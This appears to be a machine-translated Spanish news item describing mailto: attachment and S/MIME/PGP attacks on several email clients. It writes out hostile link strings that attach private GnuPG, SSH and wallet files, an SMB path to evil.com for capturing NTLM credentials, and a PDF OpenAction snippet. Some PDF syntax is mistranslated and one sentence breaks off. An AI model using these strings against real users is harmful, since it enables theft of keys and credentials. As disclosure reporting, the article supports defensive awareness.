Investigadores de la Universidad del Ruhr en Bochum (Alemania)
Enlaces "
Los clientes de correo Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) y Pegasus Mail fueron vulnerables a un ataque trivial que permite adjuntar automáticamente cualquier archivo local, especificado mediante un enlace como “mailto:?attach=path_to_file”. El archivo se adjunta sin mostrar ninguna advertencia, por lo que, sin especial atención, es posible que el usuario no se dé cuenta de que la carta se enviará con un archivo adjunto.
Por ejemplo, usando un enlace como “mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" puede insertar claves privadas de GnuPG en la carta. También puede enviar el contenido de carteras criptográficas (~/.bitcoin/wallet.dat), claves SSH (~/.ssh/id_rsa) y cualquier archivo accesible al usuario. Además, Thunderbird le permite adjuntar grupos de archivos mediante máscara utilizando construcciones como "attach=/tmp/*.txt".
Además de los archivos locales, algunos clientes de correo electrónico procesan enlaces al almacenamiento de red y rutas en el servidor IMAP. En particular, IBM Notes le permite transferir un archivo desde un directorio de red al procesar enlaces como "attach=\\evil.com\dummyfile", así como interceptar los parámetros de autenticación NTLM enviando un enlace a un servidor SMB controlado por el atacante. (la solicitud se enviará con los parámetros de autenticación del usuario actual).
Thunderbird procesa con éxito solicitudes como “attach=imap:///fetch>UID>/INBOX>1/”, que le permiten adjuntar contenido de carpetas en el servidor IMAP. Al mismo tiempo, los mensajes recuperados de IMAP, cifrados mediante OpenPGP y S/MIME, son descifrados automáticamente por el cliente de correo antes de enviarlos. Los desarrolladores de Thunderbird fueron
Las versiones antiguas de Thunderbird también eran vulnerables a otras dos variantes de ataque en PGP y S/MIME propuestas por los investigadores. En particular, Thunderbird, así como OutLook, PostBox, eM Client, MailMate y R2Mail2, fueron objeto de un ataque de reemplazo de claves, causado por el hecho de que el cliente de correo importa e instala automáticamente nuevos certificados transmitidos en mensajes S/MIME, lo que permite el atacante organizar la sustitución de las claves públicas ya almacenadas por el usuario.
El segundo ataque, al que son susceptibles Thunderbird, PostBox y MailMate, manipula las características del mecanismo de guardado automático de borradores de mensajes y permite, utilizando parámetros mailto, iniciar el descifrado de mensajes cifrados o la adición de una firma digital para mensajes arbitrarios, con posterior transmisión del resultado al servidor IMAP del atacante. En este ataque, el texto cifrado se transmite a través del parámetro "cuerpo" y la etiqueta "metaactualización" se utiliza para iniciar una llamada al servidor IMAP del atacante. Por ejemplo: ' '
Para procesar automáticamente enlaces "mailto:" sin interacción del usuario, se pueden utilizar documentos PDF especialmente diseñados: la acción OpenAction en PDF le permite iniciar automáticamente el controlador mailto al abrir un documento:
%PDF-1.5
1 0 objeto
<< /Tipo /Catálogo /AcciónAbierta [2 0 R] >>
endoobj
2 0 objeto
<< /Tipo /Acción /S /URI/URI (mailto:?body=——COMENZAR MENSAJE PGP——[…])>>
endoobj
Fuente: opennet.ru